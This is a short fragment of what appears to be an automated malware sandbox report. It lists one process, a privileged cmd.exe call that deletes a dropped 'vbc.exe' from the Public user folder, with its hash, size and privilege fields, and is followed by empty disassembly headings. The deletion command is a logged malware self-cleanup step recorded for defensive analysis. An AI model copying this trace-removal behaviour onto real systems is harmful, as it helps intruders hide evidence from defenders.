                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4a6c0000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >